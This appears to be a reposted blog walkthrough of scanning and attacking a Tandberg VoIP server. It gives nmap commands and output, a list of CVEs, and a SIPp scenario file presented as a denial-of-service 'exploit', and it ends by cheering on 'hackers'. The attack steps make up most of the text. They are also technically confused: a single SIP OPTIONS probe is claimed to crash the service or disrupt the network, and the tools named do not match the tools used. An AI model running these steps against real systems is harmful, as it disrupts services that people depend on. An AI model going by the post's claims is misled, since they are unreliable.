.png)
2 weeks ago
21 BOOK THIS SPACE FOR AD
ARTICLE AD
First, I scanned the network using the Nmap tool,
i use a command:
nmap -A -sV -sC <ip>This was the result
Nmap scan report for <ip>Host is up (0.14s latency).
Not shown: 939 filtered tcp ports (no-response), 58 closed tcp ports (reset)
PORT STATE SERVICE
25/tcp open smtp
5060/tcp open sip
5061/tcp open ssl/sip Tandberg-4145 VoIP server X14.3.4
I noticed that the port 5061 is open And It runs an SSL/SIP service, and its version is Tandberg-4145 VoIP server X14.3.4.
1- Authentication Bypass: There have been instances where attackers could bypass authentication mechanisms, allowing unauthorized access to the device. This was noted in CVE-2009–4509, which affected versions prior to 5.1.1 (reference)
2-Cross-Site Scripting (XSS): There is a vulnerability (CVE-2010–1355) that allows remote attackers to inject arbitrary web scripts or HTML into the server, which could compromise users visiting the affected web interface (reference)
3-Directory Traversal: CVE-2009–4511 highlights a directory traversal vulnerability that lets authenticated users read arbitrary files on the server. This can be exploited to access sensitive data stored on the server(reference)
4-Denial of Service (DoS): Other vulnerabilities, such as the ability to send crafted SIP packets that could crash the device, have also been identified (CVE-2012–0331) (reference)
After analyzing the server I am working on, I confirmed that there is no web server running on it. As a result, there are no cross-site scripting (XSS) vulnerabilities present. I also skipped the XSS testing guide since these vulnerabilities typically occur on web servers, which do not exist in this environment.
Instead, I focused on two other vulnerabilities: Authentication Bypass and Denial of Service (DoS).
First, I attempted to connect to the server, and I discovered that there was no authentication mechanism in place, allowing the connection to proceed successfully.
This is by order
telenet <ip><port>It tells me it’s connected, but I can’t enter commands or use the server
So I used a scanning tool called sipvicious The command to install it is :
sudo apt install sipviciousIt is a set of examination tools. I used a tool called SIPp for this task:
Using the command
sipp -sf test_Voip_exploit.xml -s <ip>:<port>This command is missing an XML file. so here is the XML file used:
<?xml version="1.0" encoding="ISO-8859-1" ?><scenario name="Basic SIP Test">
<send>
<![CDATA[
OPTIONS sip:ip SIP/2.0
Via: SIP/2.0/TCP <my ip>:<port> ;
From: <sip:tester@<myIP> ;
To: <sip:<Target IP>
Call-ID: 123456789@<my IP> ;
CSeq: 1 OPTIONS
Content-Length: 0
]]>
</send>
<recv response="200" optional="true">
<!-- انتظار استجابة 200 OK -->
</recv>
</scenario>
Then, save the file with the name test_Voip_exploit.xml
Now we have everything ready and are prepared for the attack.
So, we will use the following command:
sipp -sf test_Voip_exploit.xml -s <ip>:<port>You will notice that it has started running and using the server to connect via the VoIP protocol.
Therefore, there are two scenarios:
The first is to stop the VoIP service due to the DoS attack.The second is to establish a connection across all levels of the network, which will cause disruptions for everyone.If you’ve reached this point, thank you! I hope I have clarified everything in detail.
Enjoy your time, hackers! :)
Bengali (Bangladesh) · 
English (United States) ·